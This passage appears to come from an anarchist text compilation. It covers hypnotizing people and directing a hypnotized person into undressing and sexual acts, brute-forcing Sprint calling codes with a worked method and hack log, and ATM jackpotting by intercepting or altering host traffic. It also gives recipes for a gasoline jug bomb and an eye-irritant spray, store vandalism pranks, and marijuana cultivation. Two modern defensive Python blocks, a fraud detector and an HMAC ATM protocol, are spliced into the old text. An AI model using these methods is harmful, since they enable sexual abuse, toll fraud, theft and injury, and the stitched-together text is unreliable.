moves into your face and head, relaxing your jaws, neck, and facial muscles,
making your cares and worries float away.
Away into the blue sky as you rest blissfully on the cloud. If they are not
responsive or you think they (he or she) is going to sleep, then add in a
"...always concentrating upon my voice, ignoring all other
sounds. Even though other sounds exist, they aid you in your relaxation..."
They should soon let out a sigh as if they were letting go, and their face
should have a "woodiness" to it, becoming
featureless... Now, say the following "... You now find yourself in a hallway,
the hallway is peaceful and nice. As I count from 10 to 1 you will imagine
yourself walking further and further down the hall.
When I reach one you will find yourself where you want to be, in another, higher
state of conscious and mind. (count from ten to one)..." Do this about three or
four times. Then, to test if the subject is
under hypnosis or not, say "... You feel a strange sensation in your (arm they
write with) arm, the feeling begins at your fingers and slowly moves up your
arm, as it moves through your arm your arm
becomes lighter and lighter, it will soon be so light it will ... becoming
lighter and lighter with each breath and moment..." Their fingers should begin
to twitch and then move up, the arm following, now
my friend, you have him/her in hypnosis. The first time you do this, while
he/she is under say good things, like: "You're going to feel great tomorrow" or
"Every day in every way you will find yourself
becoming better and better".. Or some crap like that... The more they go under,
the deeper in hypnosis they will get each time you do it.
What to do when hypnotized
When you have them under you must word things very carefully to get your way.
You cannot simply say... Take off your clothes and fuck the pillow. No, that
would not really do the trick. You must
say something like.... "you find your self at home, in your room and you have to
take a shower (vividly describe their room and what's happening), you begin to
take off your clothes..." Now, it can't be
that simple, you must know the persons house, room, and shower room. Then
describe things vividly and tell them to act it out (they have to be deeply
under to do this). I would just suggest that you
experiment a while, and get to know how to do things.
Waking up
Waking up is very easy, just say "...as I count from 1 to 5 you will find
yourself becoming more and more awake, more and more lively. When you wake up
you will find yourself completely alive,
awake, and refreshed. Mentally and physically, remembering the pleasant
sensation that hypnosis brings... Waking up feeling like a new born baby, reborn
with life and vigor, feeling excellent.
Remembering that next time you enter hypnosis it will become an ever increasing
deeper and deeper state than before.
1. You feel energy course throughout your limbs.
2. You begin to breathe deeply, stirring.
3. Beginning to move more and more your eyes open, bringing you up to full
conscious.
4. You are up, up, up and awakening more and more.
5. You are awake and feeling great.
And that's it! You now know how to hypnotize yourself and someone else.
You will learn more and more as you experiment.
67. The Remote Informer Issue #1 by Tracker and Noman Bates
Introduction
Welcome to the first issue of 'The Remote Informer'! This newsletter is reader
supported. If the readers of this newsletter do not help support it, then it
will end. We are putting this out to help out the
ones that would like to read it. If you are one of those who thinks they know
everything, then don't bother reading it. This newsletter is not anything like
the future issues. The future issues will contain
several sections, as long as reader input is obtained. Below is an outline
overview of the sections in the future issues.
I/O Board (Input/Output Board)
The I/O Board is for questions you have, that we might be able to answer or at
least refer you to someone or something. We will be honest if we cannot help
you. We will not make up something, or
to the effect, just to make it look like we answered you. There will be a
section in the I/O Board for questions we cannot answer, and then the readers
will have the opportunity to answer it. We will
print anything that is reasonable in the newsletter, even complaints if you feel
like you are better than everyone.
NewsCenter
This section will be for news around the underworld. It will talk of busts of
people in the underworld and anything else that would be considered news. If you
find articles in the paper, or something
happens in your local area, type it up, and upload it to one of the boards
listed at the end of the newsletter. Your handle will be placed in the article.
If you do enter a news article, please state the date
and from where you got it.
Feature Section
The Feature Section will be the largest of the sections as it will be on the
topic that is featured in that issue. This will be largely reader input which
will be sent in between issues. At the end of the issue
at hand, it will tell the topic of the next issue, therefore, if you have
something to contribute, then you will have ample time to prepare your article.
Hardware/Software Review
In this section, we will review the good and bad points of hardware and software
related to the underworld. It will be an extensive review, rather than just a
small paragraph.
The Tops
This section will be the area where the top underworld BBS's, hacking programs,
modem scanners, etc. will be shown. This will be reader selected and will not be
altered in any way. The topics are
listed below.
· Underworld BBS's (Hack, Phreak, Card, Anarchy, etc.)
· Hacking programs for Hayes compatibles
· Hacking programs for 1030/Xm301 modems
· Modem scanners for Hayes compatibles
· Modem scanners for 1030/Xm301 modems
· Other type illegal programs
· You may add topics to the list if enough will support it.
Tid Bits
This will contain tips and helpful information sent in by the users. If you have
any information you wish to contribute, then put it in a text file and upload it
to one of the BBS's listed at the end of the
newsletter. Please, no long distance codes, mainframe passwords, etc. We may add
other sections as time goes by. This newsletter will not be put out on a regular
basis. It will be put out when we
have enough articles and information to put in it. There may be up to 5 a month,
but there will always be at least one a month. We would like you, the readers,
to send us anything you feel would be of
interest to others, like hacking hints, methods of hacking long distance
companies, companies to card from, etc. We will maintain the newsletter as long
as the readers support it. That is the end of the
introduction, but take a look at this newsletter, as it does contain information
that may be of value to you.
Hacking Sprint: The Easy Way
If you hack US Sprint, 950-0777 (by the way it is no longer GTE Sprint), and you
are frustrated at hacking several hours only to find one or two codes, then
follow these tips, and it will increase your
results tremendously. First, one thing that Mr. Mojo proved is that Sprint will
not store more than one code in every hundred numbers. (ex: 98765400 to 98765499
may contain only one code).
There may NOT be a code in that hundred, but there will never be more than one.
Sprint's 9 digit codes are stored from 500000000 through 999999999. In the
beginning of Sprint's 950 port, they
only had 8 digit codes. Then they started converting to 9 digit codes, storing
all 8 digit codes between 10000000 and 49999999 and all 9 digit codes between
500000000 and 999999999. Sprint has
since canceled most 8 digit codes, although there are a few left that have been
denoted as test codes. Occasionally, I hear of phreaks saying they have 8 digit
codes, but when verifying them, the codes
were invalid. Now, where do you start? You have already narrowed the low and
high numbers in half, therefore already increasing your chances of good results
by 50 percent. The next step is to find
a good prefix to hack. By the way, a prefix, in hacking terms, is the first
digits in a code that can be any length except the same number of digits the
code is. (ex: 123456789 is a code. That means 1,
12, 123, 1234, 12345, 123456, 1234567, and 12345678 are prefixes) The way you
find a good prefix to hack is to manually enter a code prefix. If when you enter
the code prefix and a valid
destination number and you do not hear the ringing of the recording telling you
that the code is invalid until near the end of the number, then you know the
prefix is valid. Here is a chart to follow when
doing this:
Code      - Destination    Range good codes exist
-------------------------------------------------
123456789 - 6192R          123400000 - 123499999
123456789 - 619267R        123450000 - 123459999
123456789 - 61926702R      123456000 - 123456999
123456789 - 6192670293R    123456700 - 123456799
-------------------------------------------------
(R - Denotes when ring for recording starts)
To prove this true, I ran a test using OmniHack 1.3p, written by Jolly Joe. In
this test I found a prefix where the last 3 digits were all I had to hack. I
tested each hundred of the 6 digit prefix finding
that all but 4 had the ring start after the fourth digit was dialed in the
destination number. The other four did not ring until I had finished the entire
code. I set OmniHack to hack the prefix + 00 until
prefix + 99. (ex: xxxxxxy00 to xxxxxxy99: where y is one of the four numbers
that the ring did not start until the dialing was completed.) Using this method,
I found four codes in a total of 241 attempts
using ascending hacking (AKA: Sequential). Below you will see a record of my
hack:
Range of hack            Codes found   Tries
xxxxxx300 - xxxxxx399    xxxxxx350     50
xxxxxx500 - xxxxxx599    xxxxxx568     68
xxxxxx600 - xxxxxx699    xxxxxx646     46
xxxxxx800 - xxxxxx899    xxxxxx877     77
Totals                   4 codes       241
As you see, these methods work. Follow these guidelines and tips and you should
have an increase in production of codes in the future hacking Sprint. Also, if
you have any hints/tips you think others
could benefit from, then type them up and upload them to one of the boards at
the end of the newsletter.
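Seen from the carrier's side, the run described above shows up as a burst of rejected codes packed into one block of a hundred. The following Python example is added here and is not part of the original newsletter; the log format, thresholds and code values are constructed assumptions. It keys on the code block rather than on the caller, since the text notes that 950 ports carry no ANI.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed look-back window
THRESHOLD = 20                  # assumed: distinct rejected codes in one block before alerting
BLOCK_DIGITS = 2                # trailing digits ignored, i.e. blocks of 100 codes


def parse(line):
    """Split 'TIMESTAMP key=value ...' (constructed format) into (time, code, result)."""
    stamp, *pairs = line.split()
    fields = dict(pair.split("=", 1) for pair in pairs)
    return datetime.fromisoformat(stamp), fields["code"], fields["result"]


def detect_guessing(lines):
    """Return one alert per code block that collects THRESHOLD rejections inside WINDOW."""
    rejected = defaultdict(deque)  # block -> recent (time, code) rejections
    accepted = defaultdict(deque)  # block -> recent (time, code) acceptances
    alerts = {}
    for line in lines:
        when, code, result = parse(line)
        block = code[:-BLOCK_DIGITS]
        # Drop events that have aged out of the window for this block.
        for queue in (rejected[block], accepted[block]):
            while queue and when - queue[0][0] > WINDOW:
                queue.popleft()
        if result == "VALID":
            accepted[block].append((when, code))
            if block in alerts:
                # A code accepted in an alerted block is a candidate for review.
                alerts[block]["review"].append(code)
            continue
        rejected[block].append((when, code))
        if block in alerts:
            continue
        tried = [c for _, c in rejected[block]]
        if len(set(tried)) >= THRESHOLD:
            steps = list(zip(tried, tried[1:]))
            ascending = sum(int(b) == int(a) + 1 for a, b in steps)
            alerts[block] = {
                "block": block + "x" * BLOCK_DIGITS,
                "since": rejected[block][0][0],
                "sequential": ascending >= 0.8 * len(steps),
                "review": [c for _, c in accepted[block]],
            }
    return list(alerts.values())


def sample_log():
    """Constructed records: scattered customer traffic, then one burst in a single block."""
    start = datetime(2000, 1, 1, 2, 0, 0)
    lines = []
    ordinary = [("612345678", "VALID"), ("845501293", "VALID"),
                ("845501239", "INVALID"), ("590017764", "VALID")]
    for i, (code, result) in enumerate(ordinary):
        stamp = (start + timedelta(minutes=7 * i)).isoformat()
        lines.append(f"{stamp} port=950 code={code} result={result}")
    # 30 consecutive rejected codes 20 seconds apart, then one acceptance.
    for n in range(31):
        stamp = (start + timedelta(minutes=30, seconds=20 * n)).isoformat()
        result = "VALID" if n == 30 else "INVALID"
        lines.append(f"{stamp} port=950 code={730004100 + n} result={result}")
    return lines


if __name__ == "__main__":
    for alert in detect_guessing(sample_log()):
        print(alert)
```

The single mistyped customer code in the sample raises no alert; only the block with the burst is reported, together with the code that was accepted during it.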
Rumors: Why Spread Them?
Do you ever get tired of hearing rumors? You know, someone gets an urge to
impress others, so they create a rumor that some long distance company is now
using tracing equipment. Why start
rumors? It only scares others out of phreaking, and then makes you, the person
who started the rumor, look like Mr. Big. This article is short, but it should
make you aware of the rumors that people
spread for personal gain. The best thing to do is to denote them as a rumor
starter and then leave it at that. You should not rag on them constantly, since
if the other users cannot determine if it is fact
or rumor, then they should suffer the consequences.
The New Sprint FON Calling Cards
US Sprint has opened up a new long distance network called the Fiber Optic
Network (FON), in which subscribers are given calling cards. These calling cards
are 14 digits and, though they seem
randomly generated, they are actually encrypted. The rumors floating around
about people getting caught using the Sprint FON calling cards are fact, not
rumors. The reason people are getting caught
is that they confuse the FON calling cards with the local 950 port authorization
codes. If you will remember, you never use AT&T calling cards from your home
phone. It has ANI capability, which is
not tracing, but rather the originating phone number is placed on the bill as
soon as the call is completed. They know your phone number when you call the 800
access port, but they do not record it
until your call is completed. Also, through several of my hacks, I came up with
some interesting information surrounding the new Sprint network. They are listed
below.
800-877-0000 - This number is for information on US Sprint's 800 calling card
service. I have not played around with it, but I believe it is for trouble or
help with the FON calling cards. I am not sure
if it is for subscribing to the FON network.
800-877-0002 - You hear a short tone, then nothing.
800-877-0003 - US Sprint Alpha Test Channel #1
800-877-(0004-0999) - When you call these numbers, you get a recording saying:
"Welcome to US Sprint's 1 plus service." When the recording stops, if you hit
the pound key (#) you will get the
calling card dial tone.
Other related Sprint numbers
800-521-4949 - This is the number that you subscribe to US Sprint with. You may
also subscribe to the FON network on this number. It will take 4 to 5 weeks for
your calling card to arrive.
10777 - This is US Sprint's equal access number. When you dial this number, you
then dial the number you are calling, and it will be billed through US Sprint,
and you will receive their long distance
line for that call. Note that you will be billed for calls made through equal
access. Do not mistake it to be a method of phreaking, unless used from a remote
location. If you are in US Sprint's 1+ service
then call 1+700-555-1414, which will tell you which long distance company you
are using. When you hear: "Thank you for choosing US Sprint's 1 plus service,"
hit the pound key (#), and then you
will get the US Sprint dial tone. This however is just the same as if you are
calling from your home phone if you dial direct, so you would be billed for
calls made through that, but there are ways to use
this to your advantage as in using equal access through a PBX.
Automatic Number Identification (ANI)
The true definition for Automatic Number Identification has not been widely
known to many. Automatic Number Identification, (AKA: ANI), is the process of
the destination number knowing the
originating number, which is where you are calling from. The method of achieving
this is to send the phone number that you are calling from in coded form ahead
of the destination number. Below is an
example of this.
ANI Method
Dial: 267-0293
Sent: ********2670293
* - Denotes the originating number which is coded and sent before the number
As you noticed there are 8 digits in the coded number. This is because, at least
I believe, it is stored in a binary-like form. Automatic Number Identification
means a limited future in phreaking. ANI
does not threaten phreaking very much yet, but it will in the near future. A new
switching system will soon be installed in most cities that are covered by ESS,
Electronic Switching System, now. The
system will have ANI capabilities which will be supplied to the owners of phone
lines as an added extra. The owner's phone will have an LED read-out that will
show the phone number of the people
that call you. You will be able to block some numbers, so that people cannot
call you. This system is in the testing stages currently, but will soon be
installed across most of the country. As you see,
this will end a large part of phreaking, until we, the phreakers, can come up
with an alternative. As I have been told by several, usually reliable, people,
this system is called ISS, which I am not sure of
the meaning of this, and is being tested currently in Rhode Island. 800 in-watts
lines set up by AT&T support ANI. The equipment to decode an ANI coded
origination number does not cost as much
as you would expect. 950 ports do not offer ANI capability, no matter what you
have been told. The 950 ports will only give the city in which they are based,
this usually being the largest in the state,
sometimes the capital. One last thing that I should tell you is that ANI is not
related to tracing. Tracing can be done on any number whether local, 950, etc.
One way around this, especially when
dialing Alliance TeleConferencing, is to dial through several extenders or
ports. ANI will only cover the number that is calling it, and if you call
through a number that does not support ANI, then your
number will never be known.
68. Jackpotting ATM Machines by The Jolly Roger
JACKPOTTING was done rather successfully a while back in (you guessed it) New
York. What the culprits did was sever (actually cross over) the line between the
ATM and the host. Insert a
microcomputer between the ATM and the host. Insert a fraudulent card into the
ATM. (By card I mean cash card, not hardware.) What the ATM did was: send a
signal to the host, saying "Hey! Can
I give this guy money, or is he broke, or is his card invalid?" What the
microcomputer did was: intercept the signal from the host, discard it, send
"there's no one using the ATM" signal. What the host
did was: get the "no one using" signal, send back "okay, then for God's sake
don't spit out any money!" signal to ATM. What the microcomputer did was
intercept the signal (again), throw it away
(again), send "Wow! That guy is like TOO rich! Give him as much money as he
wants. In fact, he's so loaded, give him ALL the cash we have! He is really a
valued customer." signal. What the
ATM did: what else? Obediently dispense cash till the cows came home (or very
nearly so). What the crooks got was well in excess of $120,000 (for one
weekend's work), and several years when
they were caught. This story was used at a CRYPTOGRAPHY conference I attended a
while ago to demonstrate the need for better information security. The lines
between ATM's & their hosts are
usually 'weak' in the sense that the information transmitted on them is
generally not encrypted in any way. One of the ways that JACKPOTTING can be
defeated is to encrypt the information passing
between the ATM and the host. As long as the key cannot be determined from the
ciphertext, the transmission (and hence the transaction) is secure. A more
believable, technically accurate story might
concern a person who uses a computer between the ATM and the host to determine
the key before actually fooling the host. As everyone knows, people find
cryptanalysis a very exciting and
engrossing subject..don't they? (Hee-Hee)
 _____      _______      ______
|     |-<<-|       |-<<-|      |
| ATM |    | micro |    | Host |
|_____|->>-|_______|->>-|______|
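An added example (not from the original text) of the defence the passage above points to. It uses message authentication with HMAC-SHA256 and a per-request nonce rather than encryption alone, so the ATM can reject a fabricated, altered or replayed approval; the class names, message fields and shared-key setup are assumptions made for illustration.

```python
import hashlib
import hmac
import json
import secrets


def _tag(key, fields):
    """HMAC-SHA256 over a canonical JSON encoding of the message fields."""
    payload = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def seal(key, fields):
    return {"fields": fields, "tag": _tag(key, fields)}


def open_sealed(key, message):
    """Return the fields if the tag verifies under key, otherwise None."""
    if not isinstance(message, dict):
        return None
    fields, tag = message.get("fields"), message.get("tag")
    if not isinstance(fields, dict) or not isinstance(tag, str):
        return None
    expected = _tag(key, fields).encode()
    if not hmac.compare_digest(expected, tag.encode("ascii", "replace")):
        return None
    return fields


class Host:
    def __init__(self, key, balances):
        self.key, self.balances, self.seen = key, balances, set()

    def handle(self, request):
        req = open_sealed(self.key, request)
        if req is None or req.get("type") != "withdraw_request":
            return None                       # unauthenticated traffic is ignored
        if req["nonce"] in self.seen:
            return None                       # a replayed request is ignored
        self.seen.add(req["nonce"])
        amount = req["amount"]
        ok = isinstance(amount, int) and 0 < amount <= self.balances.get(req["card"], 0)
        if ok:
            self.balances[req["card"]] -= amount
        return seal(self.key, {"type": "withdraw_response", "nonce": req["nonce"],
                               "terminal": req["terminal"],
                               "decision": "approve" if ok else "deny",
                               "amount": amount if ok else 0})


class ATM:
    def __init__(self, key, terminal_id):
        self.key, self.terminal_id, self.pending = key, terminal_id, None

    def build_request(self, card, amount):
        self.pending = {"nonce": secrets.token_hex(16), "amount": amount}
        return seal(self.key, {"type": "withdraw_request", "terminal": self.terminal_id,
                               "nonce": self.pending["nonce"], "card": card,
                               "amount": amount})

    def dispense(self, response):
        """Amount to pay out: 0 unless the reply is authentic, fresh and matches the request."""
        pending, self.pending = self.pending, None   # one reply per request
        resp = open_sealed(self.key, response)
        if pending is None or resp is None:
            return 0
        if resp.get("type") != "withdraw_response" or resp.get("terminal") != self.terminal_id:
            return 0
        if resp.get("nonce") != pending["nonce"]:
            return 0
        if resp.get("decision") != "approve" or resp.get("amount") != pending["amount"]:
            return 0
        return pending["amount"]


def run_demo():
    key = secrets.token_bytes(32)          # constructed; real terminals keep keys in hardware
    host, atm = Host(key, {"card-A": 100}), ATM(key, "T1")   # constructed account data
    approval = host.handle(atm.build_request("card-A", 40))
    honest = atm.dispense(approval)
    # A device on the line that lacks the key fabricates an approval.
    req = atm.build_request("card-A", 500)
    fake = seal(secrets.token_bytes(32), {"type": "withdraw_response", "terminal": "T1",
                                          "nonce": req["fields"]["nonce"],
                                          "decision": "approve", "amount": 500})
    forged = atm.dispense(fake)
    # The host's genuine denial is altered in transit; the tag no longer matches.
    denial = host.handle(atm.build_request("card-A", 500))
    altered = {"fields": dict(denial["fields"], decision="approve", amount=500),
               "tag": denial["tag"]}
    tampered = atm.dispense(altered)
    # An earlier genuine approval is replayed against a new request.
    atm.build_request("card-A", 40)
    replayed = atm.dispense(approval)
    return {"honest": honest, "forged": forged, "tampered": tampered,
            "replayed": replayed, "balance": host.balances["card-A"]}


if __name__ == "__main__":
    print(run_demo())
```

Only the genuine, matching approval pays out; the other three replies are refused at the ATM and the host balance changes once.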
The B of A ATM's are connected through dedicated lines to a host computer as the
Bishop said. However, for maintenance purposes, there is at least one separate
dial-up line also going to that same
host computer. This guy basically BS'ed his way over the phone till he found
someone stupid enough to give him the number. After finding that, he had his
Apple hack at the code. Simple.
Next, he had a friend go to an ATM with any B of A ATM card. He stayed at home
with the Apple connected to the host. When his friend inserted the card, the
host displayed it. The guy with the
Apple modified the status & number of the card directly in the host's memory. He
turned the card into a security card, used for testing purposes. At that point,
the ATM did whatever its operator told it
to do.
The next day, he went into the bank with the $2000 he received, talked to the
manager and told him every detail of what he'd done. The manager gave him his
business card and told him that he had a
job waiting for him when he got out of school.
Now, B of A has been warned, they might have changed the system. On the other
hand, it'd be awful expensive to do that over the whole country when only a
handful of people have the resources and
even less have the intelligence to duplicate the feat. Who knows?
69. Jug Bomb by The Jolly Roger
Take a glass jug, and put 3 to 4 drops of gasoline into it. Then put the cap on,
and swish the gas around so the inner surface of the jug is coated. Then add a
few drops of potassium permanganate
solution into it and cap it. To blow it up, either throw it at something, or
roll it at something.
70. Fun at K-Mart by The Jolly Roger
Well, first off, one must realize the importance of K-Marts in society today.
First off, K-Marts provide things cheaper to those who can't afford to shop at
higher quality stores. Although, all I ever see
in there is minorities and Senior Citizens, and the poor people in our city.
Personally, I wouldn't be caught dead in there. But, once, I did. You see, once,
after The Moon Roach and Havoc Chaos
(Dear friends of mine) and I were exploring such fun things as rooftops, we came
along a K-Mart. Amused, and cold for that matter, we wandered in. The Tension
mounts. As we walked up to the
entrance, we were nearly attacked by Youth Groups selling cheap cookies, and
wheelchair stricken people selling American Flags. After laughing at these
people, we entered. This is where the real fun
begins... First, we wandered around the store, and turned on all the blue lights
we could find. That really distracts and confuses the attendants...Fun to do...
The first neat thing, is to go to the section of
the store where they sell computers. Darkness engulfs the earth the day they
find Apple Computers being sold there. Instead, lesser computers like the
laughable C-64 can be found there...Turn it on,
and make sure nobody's looking...Then, once in Basic, type...
]10 PRINT "Fuck the world! Anarchy Rules!" (or something to that effect.)
]20 GOTO 10 and walk away.
Also, set the sample radios in the store to a satanic rock station, and turn the
radio off. Then, set the alarm for two minutes ahead of the time displayed
there. Turn the volume up all the way, and walk
away. After about two minutes, you will see the clerk feebly attempt to turn the
radio down or off. It's really neat to set ten or more radios to different
stations, and walk away. One of my favorite
things to do, is to get onto the intercom system of the store. Easier typed than
done. First, check out the garden department. You say there's no attendant
there? Good. Sneak carefully over to the
phone behind the cheap counter there, and pick it up. Dial the number
corresponding to the item that says 'PAGE'... And talk. You will note that your
voice will echo all over the bowels of K-Mart. I
would suggest announcing something on the lines of: "Anarchy rules!!"
71. Mace Substitute by The Jolly Roger
· 3 parts Alcohol
· ½ part Iodine
· ½ part Salt
-or-
· 3 parts Alcohol
· 1 part Iodized Salt (Mortons)
It's not actual mace, but it does a damn good job on the eyes...
72. How to grow Marijuana by The Jolly Roger
MARIJUANA
Marijuana is a deciduous plant which grows from seeds. The fibrous section of
the plant was (has been replaced by synthetics) used to make rope. The flowering
tops, leaves, seeds, and resin of the
plant are used by just about everyone to get HIGH. Normally, the vegetable parts
of the plant are smoked to produce this "high," but they can also be eaten. The
active ingredient in marijuana resin is
THC (Tetrahydrocannabinol). Marijuana contains from 1%-4% THC (4% must be
considered GOOD dope). Marijuana grows wild in many parts of the world, and is
cultivated in Mexico, Vietnam,
Africa, Nepal, India, South America, etc. The marijuana sold in the United
States comes primarily from, yes, the United States. It is estimated that at
least 50% of the grass on the streets in America is
homegrown. The next largest bunch comes across the borders from Mexico, with
smaller amounts filtering in from Panama, occasionally South America, and
occasionally, Africa. Hashish is the pure
resin of the marijuana plant, which is scraped from the flowering tops of the
plant and lumped together. Ganja is the ground-up tops of the finest plants. (It
is also the name given to any sort of marijuana
in Jamaica.) Marijuana will deteriorate in about two years if exposed to light,
air or heat. It should always be stored in cool places. Grass prices in the
United States are a direct reflection of the laws of
supply and demand (and you thought that high school economics would never be
useful). A series of large border busts, a short growing season, a bad crop, any
number of things can drive the price of
marijuana up. Demand still seems to be on the increase in the US, so prices
seldom fall below last year's level. Each year a small seasonal drought occurs,
as last year's supply runs low, and next year's
crop is not up yet. Prices usually rise about 20%-75% during this time and then
fall back to "normal." Unquestionably, a large shortage of grass causes a
percentage of smokers to turn to harder drugs
instead. For this reason, no grass control program can ever be beneficial or
"successful."
GROW IT!
There is one surefire way of avoiding high prices and the grass DT's: Grow your
own. This is not as difficult as some "authorities" on the subject would make
you believe. Marijuana is a weed, and a
fairly vivacious one at that, and it will grow almost in spite of you.
OUTDOORS
Contrary to popular belief, grass grows well in many places on the North American
continent. It will flourish even if the temperature does not rise above 75°.
The plants do need a minimum of eight
hours of sunlight per day and should be planted in late April/early May, BUT
DEFINITELY, after the last frost of the year. Growing an outdoor, or "au
naturel", crop has been the favored method over
the years, because grass seems to grow better without as much attention when in
its natural habitat. Of course, an outdoors setting requires special precautions
not encountered with an indoors crop;
you must be able to avoid detection, both from law enforcement freaks and common
freaks, both of whom will take your weed and probably use it. Of course, one
will also arrest you. You must also
have access to the area to prepare the soil and harvest the crop. There are two
schools of thought about starting the seeds. One says you should start the
seedlings for about ten days in an indoor
starter box (see the indoor section) and then transplant. The other theory is
that you should just start them in the correct location. Fewer plants will come
up with this method, but there is no shock of
transplant to kill some of the seedlings halfway through. The soil should be
prepared for the little devils by turning it over a couple of times and adding
about one cup of hydrated lime per square yard of
soil and a little bit (not too much, now) of good water soluble nitrogen
fertilizer. The soil should now be watered several times and left to sit about
one week. The plants should be planted at least three
feet apart, getting too greedy and stacking them too close will result in
stunted plants. The plants like some water during their growing season, BUT not
too much. This is especially true around the
roots, as too much water will rot the root system. Grass grows well in corn or
hops, and these plants will help provide some camouflage. It does not grow well
with rye, spinach, or pepperweed. It is
probably a good idea to plant in many small, broken patches, as people tend to
notice patterns.
GENERAL GROWING INFO
Both the male and the female plant produce THC resin, although the male is not as
strong as the female. In a good crop, the male will still be plenty smokable and
should not be thrown away under any
circumstances. Marijuana can reach a height of twenty feet (or would you rather
wish on a star) and obtain a diameter of 4½ inches. If normal, it has a sex
ratio of about 1:1, but this can be altered in
several ways. The male plant dies in the 12th week of growing, the female will
live another 3-5 weeks to produce her younguns. Females can weigh twice as much
as males when they are mature.
Marijuana soil should compact when you squeeze it, but should also break apart
with a small pressure and absorb water well. A nice test for either indoor or
outdoor growing is to add a bunch of
worms to the soil, if they live and hang around, it is good soil, but if they
don't, well, change it. Worms also help keep the soil loose enough for the
plants to grow well.
SEEDS
To get good grass, you should start with the right seeds. A nice starting point
is to save the seeds from the best batch you have consumed. The seeds should be
virile, that is, they should not be gray and
shriveled up, but green, meaty, and healthy appearing. A nice test is to drop
the seeds on a hot frying pan. If they "CRACK," they are probably good for
planting purposes. The seeds should be soaked
in distilled water overnight before planting. BE SURE to plant in the ground
with the pointy end UP. Plant about ½" deep. Healthy seeds will sprout in about
five days.
SPROUTING
The best all around sprouting method is probably to make a sprouting box (as
sold in nurseries) with a slatted bottom or use paper cups with holes punched in
the bottoms. The sprouting soil should be
a mixture of humus, soil, and fine sand with a bit of organic fertilizer and
water mixed in about one week before planting. When ready to transplant, you
must be sure and leave a ball of soil around the
roots of each plant. This whole ball is dropped into a baseball-sized hole in
the permanent soil. If you are growing/transplanting indoors, you should use a
green safe light (purchased at nurseries) during
the transplanting operation. If you are transplanting outdoors, you should time
it about two hours before sunset to avoid damage to the plant. Always wear
cotton gloves when handling the young plants.
After the plants are set in the hole, you should water them. It is also a good
idea to use a commercial transplant chemical (also purchased at nurseries) to
help them overcome the shock.
INDOOR GROWING
Indoor growing has many advantages, besides the apparent fact that it is much
harder to have your crop "found," you can control the ambient conditions just
exactly as you want them and get a
guaranteed "good" plant. Plants grown indoors will not appear the same as their
outdoor cousins. They will be scrawnier appearing with weak stems and may even
require you to tie them to a growing
post to remain upright, BUT THEY WILL HAVE AS MUCH OR MORE RESIN! If growing in
a room, you should put tar paper on the floors and then buy sterilized bags of
soil from a nursery. You
will need about one cubic foot of soil for each plant. The plants will need
about 150 mL. of water per plant/per week. They will also need fresh air, so the
room must be ventilated. (However, the fresh
air should contain NO TOBACCO smoke.) At least eight hours of light a day must
be provided. As you increase the light, the plants grow faster and show more
females/less males. Sixteen hours of
light per day seems to be the best combination, beyond this makes little or no
appreciable difference in the plant quality. Another idea is to interrupt the
night cycle with about one hour of light. This
gives you more females. The walls of your growing room should be painted white
or covered with aluminum foil to reflect the light. The lights themselves can be
either bulbs or fluorescents. Figure about
75 watts per plant or one plant per two feet of fluorescent tube. The
fluorescents are the best, but do not use "cool white" types. The light sources
should be an average of twenty inches from the plant
and NEVER closer than 14 inches. They may be mounted on a rack and moved every
few days as the plants grow. The very best light sources are those made by
Sylvania and others especially for
growing plants (such as the "gro lux" types).
HARVESTING AND DRYING
The male plants will be taller and have about five green or yellow sepals, which
will split open to fertilize the female plant with pollen. The female plant is
shorter and has a small pistillate flower, which
really doesn't look like a flower at all but rather a small bunch of leaves in a
cluster. If you don't want any seeds, just good dope, you should pick the males
before they shed their pollen as the female
will use some of her resin to make the seeds. After another three to five weeks,
after the males are gone, the females will begin to wither and die (from
loneliness?), this is the time to pick. In some
nefarious Middle Eastern countries, farmers reportedly put their beehives next
to fields of marijuana. The little devils collect the grass pollen for their
honey, which is supposed to contain a fair dosage of
THC. The honey is then enjoyed by conventional methods or made into ambrosia. If
you want seeds - let the males shed his pollen then pick him. Let the female go
another month and pick her. To cure
the plants, they must be dried. On large crops, this is accomplished by
constructing a drying box or drying room. You must have a heat source (such as
an electric heater) which will make the box/room
reach 130°. The box/room must be ventilated to carry off the water-vapor-laden
air and replace it with fresh. A good box can be constructed from an orange
crate with fiberglass insulated walls, vents
in the tops, and screen shelves to hold the leaves. There must be a baffle
between the leaves and the heat source. A quick cure for smaller amounts is to:
cut the plant at the soil level and wrap it in a
cloth so as not to lose any leaves. Take out any seeds by hand and store. Place
all the leaves on a cookie sheet or aluminum foil and put them in the middle
shelf of the oven, which is set on "broil." In
a few seconds, the leaves will smoke and curl up, stir them around and give
another ten seconds before you take them out.
TO INCREASE THE GOOD STUFF
There are several tricks to increase the number of females, or the THC content
of plants: You can make the plants mature in 36 days if you are in a hurry, by
cutting back on the light to about 14 hours,
but the plants will not be as big. You should gradually shorten the light cycle
until you reach fourteen hours. You can stop any watering as the plants begin to
bake the resin rise to the flowers. This will
increase the resin a bit. You can use a sunlamp on the plants as they begin to
develop flower stalks. You can snip off the flower, right at the spot where it
joins the plant, and a new flower will form in a
couple of weeks. This can be repeated two or three times to get several times
more flowers than usual.
If the plants are sprayed with Ethrel early in their growing stage, they will
produce almost all female plants. This usually speeds up the flowering also, it
may happen in as little as two weeks. You can
employ a growth changer called colchicine. This is a bit hard to get and
expensive. (Should be ordered through a lab of some sort and costs about $35 a
gram.) To use the colchicine, you should
prepare your presoaking solution of distilled water with about 0.10 per cent
colchicine. This will cause many of the seeds to die and not germinate, but the
ones that do come up will be polyploid plants.
This is the accepted difference between such strains as "gold" and normal grass,
and yours will DEFINITELY be superweed. The problem here is that colchicine is a
poison in larger quantities and may
be poisonous in the first generation of plants. Bill Drake, author of
CONNOISSEUR'S HANDBOOK OF MARIJUANA runs a very complete colchicine treatment
down and warns against smoking
the first generation plants (all succeeding generations will also be polyploid)
because of this poisonous quality. However, the Medical Index shows colchicine
being given in very small quantities to
people for treatment of various ailments. Although these quantities are small,
they would appear to be larger than any you could receive from smoking a
seed-treated plant. It would be a good idea to
buy a copy of CONNOISSEUR'S, if you are planning to attempt this, and read Mr.
Drake's complete instructions. Another still-experimental process to increase
the resin is to pinch off the leaf tips as
soon as they appear from the time the plant is in the seedling stage on through
its entire life-span. This produces a distorted, wrecked-looking plant which
would be very difficult to recognize as
marijuana. Of course, there is less substance to this plant, but such wrecked
creatures have been known to produce so much resin that it crystallizes a strong
hash all over the surface of the plant - might
